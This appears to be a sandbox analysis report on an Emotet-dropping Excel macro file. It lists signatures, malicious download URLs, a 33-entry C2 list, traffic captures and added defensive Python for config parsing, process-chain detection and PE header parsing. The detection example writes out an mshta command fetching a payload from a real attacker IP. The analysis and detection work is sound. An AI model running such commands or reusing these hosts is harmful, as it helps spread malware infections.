Windows Analysis Report
80_513972285.xls

Overview

General Information

Sample Name: 80_513972285.xls
Analysis ID: 562424
MD5: c130bfd7e7632f18fcd505d0991f192f
SHA1: da0d0031d5f6386f0df623a3c1cabfe4e9778f51
SHA256: eaad4c93a96bb50a79e024650ae4808afd7fddbd604cbc4048416ddcb20e6aae
Tags: SilentBuilderxls

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection

Source: http://kuyporn.com/wp-content/XS Avira URL Cloud: Label: malware
Source: http://docs-construction.com/wp-admin/JJEf0kEA5/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlMuzL Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlWinSta0 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlfunction Avira URL Cloud: Label: malware
Source: https://grupomartinsanchez.com/w Avira URL Cloud: Label: malware
Source: https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlv1.0 Avira URL Cloud: Label: malware
Source: https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/PE3 Avira URL Cloud: Label: malware
Source: https://elroieyecentre.org/cgi-b Avira URL Cloud: Label: malware
Source: https://thaireportchannel.com/wp-includes/KaWZp0odkEO/PE3 Avira URL Cloud: Label: malware
Source: http://jeffreylubin.igclout.com/wp-admin/vzOG/ Avira URL Cloud: Label: malware
Source: http://kuyporn.com/wp-content/XSs5/ Avira URL Cloud: Label: malware
Source: http://docs-construction.com/wp-admin/JJEf0kEA5/ Avira URL Cloud: Label: malware
Source: http://flybustravel.com/cgi-bin/2TjUH/ Avira URL Cloud: Label: malware
Source: http://wallacebradley.com/css/Yc Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlXtrP Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.pngPE3 Avira URL Cloud: Label: malware
Source: http://wallacebradley.com/css/YcDc927SJR/ Avira URL Cloud: Label: malware
Source: https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/PE3 Avira URL Cloud: Label: malware
Source: https://algzor.com/wp-includes/g Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlEtrM Avira URL Cloud: Label: malware
Source: http://wallacebradley.com/css/YcDc927SJR/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlhttp://91.240.118.168/qqw/aas/se.html Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlA( Avira URL Cloud: Label: malware
Source: https://bluwom-milano.com/wp-content/FEj3y4z/ Avira URL Cloud: Label: malware
Source: https://esaci-egypt.com/wp-includes/W7qXVeGp/ Avira URL Cloud: Label: malware
Source: https://thaireportchannel.com/wp-includes/KaWZp0odkEO/ Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlO( Avira URL Cloud: Label: malware
Source: http://kuyporn.com Avira URL Cloud: Label: malware
Source: http://flybustravel.com/cgi-bin/2TjUH/PE3 Avira URL Cloud: Label: malware
Source: http://kuyporn.com/wp-content/XSs5/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.html Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlB Avira URL Cloud: Label: malware
Source: https://bluwom-milano.com/wp-con Avira URL Cloud: Label: malware
Source: https://bluwom-milano.com/wp-content/FEj3y4z/PE3 Avira URL Cloud: Label: malware
Source: http://jeffreylubin.igclout.com Avira URL Cloud: Label: malware
Source: https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/ Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.png Avira URL Cloud: Label: malware
Source: https://thaireportchannel.com/wp Avira URL Cloud: Label: malware
Source: http://jeffreylubin.igclout.com/ Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlC: Avira URL Cloud: Label: malware
Source: http://flybustravel.com/cgi-bin/ Avira URL Cloud: Label: malware
Source: http://jeffreylubin.igclout.com/wp-admin/vzOG/PE3 Avira URL Cloud: Label: malware
Source: https://esaci-egypt.com/wp-inclu Avira URL Cloud: Label: malware
Source: https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/ Avira URL Cloud: Label: malware
Source: http://91.240.118.168 URL Reputation: Label: malware
Source: https://algzor.com/wp-includes/ghFXVrGLEh/PE3 Avira URL Cloud: Label: malware
Source: https://algzor.com/wp-includes/ghFXVrGLEh/ Avira URL Cloud: Label: malware
Source: https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/ Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlmshta Avira URL Cloud: Label: malware
Source: https://esaci-egypt.com/wp-includes/W7qXVeGp/PE3 Avira URL Cloud: Label: malware
Source: https://pcovestudio.com/wp-admin Avira URL Cloud: Label: malware
Source: 10.2.rundll32.exe.2130000.4.raw.unpack Malware Configuration Extractor: Emotet {"C2 list": ["74.207.230.120:8080", "139.196.72.155:8080", "37.44.244.177:8080", "37.59.209.141:8080", "116.124.128.206:8080", "217.182.143.207:443", "54.37.228.122:443", "203.153.216.46:443", "168.197.250.14:80", "207.148.81.119:8080", "195.154.146.35:443", "78.46.73.125:443", "191.252.103.16:80", "210.57.209.142:8080", "185.168.130.138:443", "142.4.219.173:8080", "118.98.72.86:443", "78.47.204.80:443", "159.69.237.188:443", "190.90.233.66:443", "104.131.62.48:8080", "62.171.178.147:8080", "185.148.168.15:8080", "54.38.242.185:443", "198.199.98.78:8080", "194.9.172.107:8080", "85.214.67.203:8080", "66.42.57.149:443", "185.148.168.220:8080", "103.41.204.169:8080", "128.199.192.135:8080", "195.77.239.39:8080", "59.148.253.194:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}
Source: 80_513972285.xls ReversingLabs: Detection: 33%
Source: kuyporn.com Virustotal: Detection: 9%
Source: C:\ProgramData\QWER.dll Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854
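The configuration the Malware Configuration Extractor pulled from the unpacked rundll32.exe memory (above) lists 33 C2 endpoints and two base64 "Public Key" strings. Added example, not code from the report or from Joe Sandbox: a Python script that validates each C2 entry, groups the endpoints by port for blocklisting, and decodes the key strings. They decode to Windows CNG BCRYPT_ECCKEY_BLOB structures, so the first four bytes identify each key (ECS1 is an ECDSA P-256 public key, ECK1 an ECDH P-256 public key) and the X and Y coordinates that follow can be checked against the P-256 curve equation, which catches a truncated or mis-extracted key. The configuration values are copied from the report; the function and constant names are assumptions of this example.

```python
import base64
import ipaddress
import struct

# Emotet configuration as the sandbox extracted it from the unpacked
# rundll32.exe memory (values copied from the report above).
EMOTET_CONFIG = {
    "C2 list": [
        "74.207.230.120:8080", "139.196.72.155:8080", "37.44.244.177:8080",
        "37.59.209.141:8080", "116.124.128.206:8080", "217.182.143.207:443",
        "54.37.228.122:443", "203.153.216.46:443", "168.197.250.14:80",
        "207.148.81.119:8080", "195.154.146.35:443", "78.46.73.125:443",
        "191.252.103.16:80", "210.57.209.142:8080", "185.168.130.138:443",
        "142.4.219.173:8080", "118.98.72.86:443", "78.47.204.80:443",
        "159.69.237.188:443", "190.90.233.66:443", "104.131.62.48:8080",
        "62.171.178.147:8080", "185.148.168.15:8080", "54.38.242.185:443",
        "198.199.98.78:8080", "194.9.172.107:8080", "85.214.67.203:8080",
        "66.42.57.149:443", "185.148.168.220:8080", "103.41.204.169:8080",
        "128.199.192.135:8080", "195.77.239.39:8080", "59.148.253.194:443",
    ],
    "Public Key": [
        "RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0",
        "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW",
    ],
}

# CNG BCRYPT_ECCKEY_BLOB magics from bcrypt.h: the blob is magic (4 bytes),
# cbKey (4 bytes, little-endian), then X and Y, each cbKey bytes big-endian.
ECC_BLOB_KINDS = {
    b"ECK1": "ECDH P-256 public key (BCRYPT_ECDH_PUBLIC_P256_MAGIC)",
    b"ECS1": "ECDSA P-256 public key (BCRYPT_ECDSA_PUBLIC_P256_MAGIC)",
}

# NIST P-256 parameters: field prime, coefficient b, and base point G.
P256_P = 0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF
P256_B = 0x5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B
P256_GX = 0x6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296
P256_GY = 0x4FE342E2FE1A7F9B8EE7EB4A7C0F9E162BCE33576B315ECECBB6406837BF51F5


def on_p256_curve(x, y):
    """True iff (x, y) satisfies y^2 = x^3 - 3x + b over GF(p)."""
    if not (0 <= x < P256_P and 0 <= y < P256_P):
        return False
    return (y * y - (x * x * x - 3 * x + P256_B)) % P256_P == 0


def parse_ecc_blob(b64):
    """Decode a base64 CNG ECC public-key blob into magic, cbKey, X, Y."""
    blob = base64.b64decode(b64, validate=True)
    if len(blob) < 8:
        raise ValueError("blob shorter than the 8-byte BCRYPT_ECCKEY_BLOB header")
    magic, cb_key = struct.unpack_from("<4sI", blob, 0)
    if magic not in ECC_BLOB_KINDS:
        raise ValueError(f"unknown ECC blob magic {magic!r}")
    if len(blob) != 8 + 2 * cb_key:
        raise ValueError(f"expected {8 + 2 * cb_key} bytes, got {len(blob)}")
    x = int.from_bytes(blob[8:8 + cb_key], "big")
    y = int.from_bytes(blob[8 + cb_key:8 + 2 * cb_key], "big")
    return {
        "magic": magic.decode("ascii"),
        "kind": ECC_BLOB_KINDS[magic],
        "key_bytes": cb_key,
        "x": x,
        "y": y,
        # a key that fails this check was mis-extracted or corrupted
        "on_curve": on_p256_curve(x, y),
    }


def parse_c2(entry):
    """Split 'ip:port', rejecting anything that is not an IP:port pair."""
    host, sep, port = entry.rpartition(":")
    if not sep:
        raise ValueError(f"no port in {entry!r}")
    ip = ipaddress.ip_address(host)
    port = int(port)
    if not 0 < port < 65536:
        raise ValueError(f"bad port in {entry!r}")
    return ip, port


def summarize(config):
    """Validate every C2 and key; group C2s by port for blocklists."""
    by_port = {}
    for entry in config["C2 list"]:
        ip, port = parse_c2(entry)
        by_port.setdefault(port, []).append(str(ip))
    keys = [parse_ecc_blob(k) for k in config["Public Key"]]
    return {"c2_count": sum(len(v) for v in by_port.values()),
            "by_port": by_port, "keys": keys}


if __name__ == "__main__":
    summary = summarize(EMOTET_CONFIG)
    for port, ips in sorted(summary["by_port"].items()):
        print(f"port {port}: {len(ips)} C2s")
    for key in summary["keys"]:
        print(f"{key['magic']}: {key['kind']}, on curve: {key['on_curve']}")
```

The on-curve check is the cheap sanity test worth keeping in any config parser: coordinates that do not satisfy the curve equation cannot be a valid P-256 key and point to a bad extraction rather than a new key. Grouping by port matters for response because the 80 and 443 endpoints blend into ordinary web egress while 8080 can usually be blocked outright.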

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 91.240.118.168:80
Source: global traffic DNS query: name: kuyporn.com
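The lines above record only the first hop of the execution chain (EXCEL.EXE creating cmd.exe); the Sigma hits in the Signatures list (Microsoft Office product spawning a Windows shell, MSHTA spawning a Windows shell, suspicious PowerShell command line, PE file dropped to C:\ProgramData) describe the rest. Added example, not part of the report: Python detection logic that applies those rules to process-creation events and reconstructs the parent chain behind each hit. The events are constructed: the image paths and the dropped DLL path C:\ProgramData\QWER.dll come from the report, while the command lines, the rundll32 export name and the thresholds are assumed stand-ins.

```python
import re

# Constructed process-creation events approximating the chain this report
# attributes to the sample (Excel -> cmd -> mshta -> powershell -> rundll32).
# Image paths and C:\ProgramData\QWER.dll are the report's; the command
# lines are assumed stand-ins. The explorer/cmd pair is a benign control.
EVENTS = [
    {"pid": 1, "ppid": 0, "image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "cmdline": r'"EXCEL.EXE" 80_513972285.xls'},
    {"pid": 2, "ppid": 1, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c mshta http://91.240.118.168/qqw/aas/se.html"},
    {"pid": 4, "ppid": 2, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://91.240.118.168/qqw/aas/se.html"},
    {"pid": 6, "ppid": 4, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -enc " + "A" * 1200},  # placeholder for the encoded script
    {"pid": 9, "ppid": 6, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"rundll32 C:\ProgramData\QWER.dll,Control_RunDLL"},  # export name assumed
    {"pid": 20, "ppid": 0, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 21, "ppid": 20, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd /c dir"},
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
          "mshta.exe", "rundll32.exe", "regsvr32.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
LONG_CMDLINE = 1000  # "very long cmdline" threshold, assumed for this example
DROP_DIRS = ("c:\\programdata\\", "c:\\users\\public\\", "c:\\windows\\temp\\")
DLL_ARG = re.compile(r'([a-z]:\\[^,\s"]+\.dll)', re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(events):
    """Return (pid, rule) pairs for every event a rule fires on."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        pname = basename(parent["image"]) if parent else ""
        if pname in OFFICE_APPS and name in SHELLS:
            findings.append((e["pid"], "office_spawns_shell"))
        if pname in SCRIPT_HOSTS and name in SHELLS:
            findings.append((e["pid"], "script_host_spawns_shell"))
        if name == "mshta.exe" and re.search(r"https?://", e["cmdline"], re.I):
            findings.append((e["pid"], "mshta_remote_content"))
        if name == "powershell.exe" and len(e["cmdline"]) > LONG_CMDLINE:
            findings.append((e["pid"], "long_powershell_cmdline"))
        if name == "rundll32.exe":
            m = DLL_ARG.search(e["cmdline"])
            if m and m.group(1).lower().startswith(DROP_DIRS):
                findings.append((e["pid"], "rundll32_dll_from_drop_dir"))
    return findings


def chain(events, pid):
    """Image names from the root ancestor down to pid, joined with ' > '."""
    by_pid = {e["pid"]: e for e in events}
    names, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        names.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return " > ".join(reversed(names))


if __name__ == "__main__":
    for pid, rule in evaluate(EVENTS):
        print(f"{rule:28} pid {pid}: {chain(EVENTS, pid)}")
```

Each rule on its own is noisy (administrators do run cmd.exe from Explorer, which is why the control pair must produce no finding); the value is in the parent chain, where an Office process at the root of a shell, script host and rundll32 sequence is the signal the Sigma rules in this report are built around.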

Networking

Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49168 -> 91.240.118.168:80
Source: Malware configuration extractor IPs: 74.207.230.120:8080
Source: Malware configuration extractor IPs: 139.196.72.155:8080
Source: Malware configuration extractor IPs: 37.44.244.177:8080
Source: Malware configuration extractor IPs: 37.59.209.141:8080
Source: Malware configuration extractor IPs: 116.124.128.206:8080
Source: Malware configuration extractor IPs: 217.182.143.207:443
Source: Malware configuration extractor IPs: 54.37.228.122:443
Source: Malware configuration extractor IPs: 203.153.216.46:443
Source: Malware configuration extractor IPs: 168.197.250.14:80
Source: Malware configuration extractor IPs: 207.148.81.119:8080
Source: Malware configuration extractor IPs: 195.154.146.35:443
Source: Malware configuration extractor IPs: 78.46.73.125:443
Source: Malware configuration extractor IPs: 191.252.103.16:80
Source: Malware configuration extractor IPs: 210.57.209.142:8080
Source: Malware configuration extractor IPs: 185.168.130.138:443
Source: Malware configuration extractor IPs: 142.4.219.173:8080
Source: Malware configuration extractor IPs: 118.98.72.86:443
Source: Malware configuration extractor IPs: 78.47.204.80:443
Source: Malware configuration extractor IPs: 159.69.237.188:443
Source: Malware configuration extractor IPs: 190.90.233.66:443
Source: Malware configuration extractor IPs: 104.131.62.48:8080
Source: Malware configuration extractor IPs: 62.171.178.147:8080
Source: Malware configuration extractor IPs: 185.148.168.15:8080
Source: Malware configuration extractor IPs: 54.38.242.185:443
Source: Malware configuration extractor IPs: 198.199.98.78:8080
Source: Malware configuration extractor IPs: 194.9.172.107:8080
Source: Malware configuration extractor IPs: 85.214.67.203:8080
Source: Malware configuration extractor IPs: 66.42.57.149:443
Source: Malware configuration extractor IPs: 185.148.168.220:8080
Source: Malware configuration extractor IPs: 103.41.204.169:8080
Source: Malware configuration extractor IPs: 128.199.192.135:8080
Source: Malware configuration extractor IPs: 195.77.239.39:8080
Source: Malware configuration extractor IPs: 59.148.253.194:443
Source: global traffic HTTP traffic detected: GET /qqw/aas/se.png HTTP/1.1
    Host: 91.240.118.168
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/XSs5/ HTTP/1.1
    Host: kuyporn.com
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-admin/vzOG/ HTTP/1.1
    Host: jeffreylubin.igclout.com
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK
    Content-Type: application/x-msdownload
    Content-Length: 557056
    Connection: keep-alive
    Keep-Alive: timeout=15
    Date: Fri, 28 Jan 2022 20:24:48 GMT
    Server: Apache
    Cache-Control: no-cache, must-revalidate
    Pragma: no-cache
    Expires: Fri, 28 Jan 2022 20:24:48 GMT
    Content-Disposition: attachment; filename="NsLUiuT.dll"
    Content-Transfer-Encoding: binary
    Set-Cookie: 61f451108e964=1643401488; expires=Fri, 28-Jan-2022 20:25:48 GMT; Max-Age=60; path=/
    Last-Modified: Fri, 28 Jan 2022 20:24:48 GMT
    X-Frame-Options: SAMEORIGIN
    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 91 fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 20 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 10 00 00 5d f5 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 76 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 76 02 00 00 a0 05 00 00 80 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 76 93 00 00 00 20 08 00 00 a0 00 00 00 e0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Data Ascii: MZ@
Source: global traffic HTTP traffic detected: GET /qqw/aas/se.html HTTP/1.1
    Accept: */*
    Accept-Language: en-US
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 91.240.118.168
    Connection: Keep-Alive
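The 200 OK response recorded above (Content-Type application/x-msdownload, Content-Disposition filename "NsLUiuT.dll") begins with an MZ header, which is the "Downloads executable code via HTTP" finding. Added example, not part of the report: a Python parser for the start of that download that reads the DOS header, follows e_lfanew to the PE signature and decodes the COFF file header and optional-header magic. That is enough to confirm the body is a 32-bit DLL and to recover its link timestamp, which is worth comparing with the response's Date header. The DOS header and PE/COFF bytes are copied from the Data Raw dump; the DOS stub and Rich header between them are replaced with zero padding, and the constant and function names are assumptions of this example.

```python
import struct
from datetime import datetime, timezone

# Bytes copied from the "Data Raw" dump of the response above: the 64-byte
# DOS header, then the PE signature, COFF file header and the first bytes
# of the optional header. The DOS stub and Rich header that sit between
# them (offsets 0x40..0xEF) take no part in the parse, so this constructed
# sample replaces them with zero padding of the same length.
DOS_HEADER_HEX = (
    "4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 "
    "b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 "
    "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "
    "00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00"
)
PE_HEADER_HEX = (
    "50 45 00 00 4c 01 05 00 91 fa f3 61 00 00 00 00 "
    "00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00"
)

MACHINES = {0x014C: "x86 (I386)", 0x8664: "x64 (AMD64)"}
OPT_MAGIC = {0x10B: "PE32", 0x20B: "PE32+"}
IMAGE_FILE_DLL = 0x2000


def build_sample():
    """Reassemble the constructed sample: DOS header, zero padding, PE header."""
    dos = bytes.fromhex(DOS_HEADER_HEX)
    e_lfanew = struct.unpack_from("<I", dos, 0x3C)[0]
    return dos + b"\x00" * (e_lfanew - len(dos)) + bytes.fromhex(PE_HEADER_HEX)


def parse_pe_headers(data):
    """Validate the MZ/PE signatures and decode the COFF file header."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature: not a PE file")
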